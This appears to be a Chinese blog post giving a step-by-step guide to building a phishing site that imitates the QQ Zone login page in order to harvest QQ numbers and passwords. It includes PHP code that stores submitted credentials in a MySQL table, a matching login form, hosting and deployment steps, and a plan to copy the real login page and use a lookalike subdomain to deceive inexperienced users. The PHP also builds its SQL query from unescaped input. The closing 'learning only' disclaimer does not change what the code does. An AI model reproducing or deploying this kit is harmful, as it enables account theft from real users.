今天在群里,有个人发了个伪装qq空间的登录界面,也就是所谓的钓鱼网站。不知道的人会去登录,然后他们的qq号及密码会被记录,qq就这样被盗了。
外面下雨,呆宿舍无聊,于是我也想弄个玩玩。
其实思路很简单:做个高仿的qq空间登录界面->对用户输入的信息post到后台并存入数据库。
在学校用jsp也做了不少的xxx管理系统,知识都是相通的,php也差不多,下午花了点时间学了点php接收前台数据和写入数据库基本知识。下面开搞:
1.申请免费空间,我选择:http://www.freewebhostingarea.com/ 这个支持php,mysql.申请的空间 3个月没访问的话自动收回。申请成功会得到一个2级域名,这里我申请的是:http://fjut.ueuo.com。
2.在它提供的phpMyAdmin中,新建一个表:qq_info 字段:qq, pwd。类型为varchar(20)。
3.写个测试后台接收数据并写入数据库的php页面 Info_Rec.php :
<?php
//接收参数
$nameStr=$HTTP_POST_VARS["name"];
$pwdStr=$HTTP_POST_VARS["pwd"];
//连接数据库
$con=mysql_connect("localhost","填写数据库名","填写密码") or die("<br>连接服务器失败!");
//sql语句串
$sql="insert into qq_info values('".$nameStr."','".$pwdStr."')";
//发送查询字符串
$query=mysql_db_query("填写数据库名", $sql, $con) or die("<br>写入数据库失败!");
echo "<br>保存到数据库成功!"
?>
4.前台页面,先写个测试页面 index.html :
<form method="post" action="Info_Rec.php"> qq号:<input name="name" type="text" value=""/> <br> 密码:<input name="pwd" type="password" value=""/> <br> <input type="submit" name="Submit" value="登录"/> </form>
5.上传2个页面文件到空间根目录。
6.打开http://fjut.ueuo.com输入qq号和密码,点登陆。
7.响应成功:
8.打开phpMyAdmin查看qq_info表,说明提交、写入数据库成功:
9.基本功能有了。有时间的话把qq空间的登录界面扒过来做个高仿的,再重新申请个空间2级域名类似user.qzone……。更能达到迷惑小白的效果。
ps:学习交流,咋不做坏事哦。